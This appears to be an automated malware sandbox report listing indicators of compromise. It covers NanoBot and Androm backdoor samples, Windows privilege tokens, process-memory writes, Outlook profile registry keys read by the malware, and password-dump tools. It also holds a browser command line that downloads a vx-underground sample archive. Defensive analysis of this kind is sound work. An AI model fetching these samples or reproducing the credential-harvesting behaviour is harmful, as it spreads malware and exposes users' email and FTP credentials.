Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exepid process 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 2968 HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe 2968 HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 3416 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exeRegAsm.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedw20.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeGetBP.exeEmailPasswordDump.exeFTPPasswordDump.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exedescription pid process Token: SeRestorePrivilege 4348 7zFM.exe Token: 35 4348 7zFM.exe Token: SeSecurityPrivilege 4348 7zFM.exe Token: SeDebugPrivilege 4240 RegAsm.exe Token: SeSecurityPrivilege 4348 7zFM.exe Token: SeSecurityPrivilege 4348 7zFM.exe Token: SeRestorePrivilege 4352 7z.exe Token: 35 4352 7z.exe Token: SeSecurityPrivilege 4352 7z.exe Token: SeSecurityPrivilege 4352 7z.exe Token: SeRestorePrivilege 2808 7z.exe Token: 35 2808 7z.exe Token: SeSecurityPrivilege 2808 7z.exe Token: SeSecurityPrivilege 2808 7z.exe Token: SeRestorePrivilege 1444 7z.exe Token: 35 1444 7z.exe Token: SeSecurityPrivilege 1444 7z.exe Token: SeSecurityPrivilege 1444 7z.exe Token: SeRestorePrivilege 2884 7z.exe Token: 35 2884 7z.exe Token: SeSecurityPrivilege 2884 7z.exe Token: SeSecurityPrivilege 2884 7z.exe Token: SeRestorePrivilege 2216 7z.exe Token: 35 2216 7z.exe Token: SeSecurityPrivilege 2216 7z.exe Token: SeSecurityPrivilege 2216 7z.exe Token: SeRestorePrivilege 3424 7z.exe Token: 35 3424 7z.exe Token: SeSecurityPrivilege 3424 7z.exe Token: SeSecurityPrivilege 3424 7z.exe Token: SeRestorePrivilege 712 7z.exe Token: 35 712 7z.exe Token: SeSecurityPrivilege 712 7z.exe Token: SeSecurityPrivilege 712 7z.exe Token: SeRestorePrivilege 3488 7z.exe Token: 35 3488 7z.exe Token: SeSecurityPrivilege 3488 7z.exe Token: SeSecurityPrivilege 3488 7z.exe Token: SeRestorePrivilege 3908 7z.exe Token: 35 3908 7z.exe Token: SeSecurityPrivilege 3908 7z.exe Token: SeSecurityPrivilege 3908 7z.exe Token: SeRestorePrivilege 1932 7z.exe Token: 35 1932 7z.exe Token: SeSecurityPrivilege 1932 7z.exe Token: SeSecurityPrivilege 1932 7z.exe Token: SeRestorePrivilege 1168 7z.exe Token: 35 1168 7z.exe Token: SeSecurityPrivilege 1168 7z.exe Token: SeSecurityPrivilege 1168 7z.exe Token: SeRestorePrivilege 2340 7z.exe Token: 35 2340 7z.exe Token: SeSecurityPrivilege 2340 7z.exe Token: SeSecurityPrivilege 2340 7z.exe Token: SeBackupPrivilege 2572 dw20.exe Token: SeBackupPrivilege 2572 dw20.exe Token: SeSecurityPrivilege 4348 7zFM.exe Token: SeDebugPrivilege 3172 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe Token: SeSecurityPrivilege 4348 7zFM.exe Token: SeSecurityPrivilege 4348 7zFM.exe Token: SeDebugPrivilege 744 GetBP.exe Token: SeDebugPrivilege 2328 EmailPasswordDump.exe Token: SeDebugPrivilege 4964 FTPPasswordDump.exe Token: SeDebugPrivilege 2008 HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exeBackdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exepid process 4348 7zFM.exe 4348 7zFM.exe 4348 7zFM.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 4348 7zFM.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exepid process 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXERegAsm.exepid process 1980 WINWORD.EXE 1980 WINWORD.EXE 1980 WINWORD.EXE 1980 WINWORD.EXE 1980 WINWORD.EXE 1980 WINWORD.EXE 3416 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1872 wrote to memory of 4668 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4668 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 4820 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 748 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 748 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe PID 1872 wrote to memory of 3904 1872 msedge.exe msedge.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
Processes:
HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe -
outlook_win_path 1 IoCs
Processes:
HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z1⤵PID:4860
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5032 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:11⤵PID:1384
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=1344 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:11⤵PID:4892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4180 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:2784
-
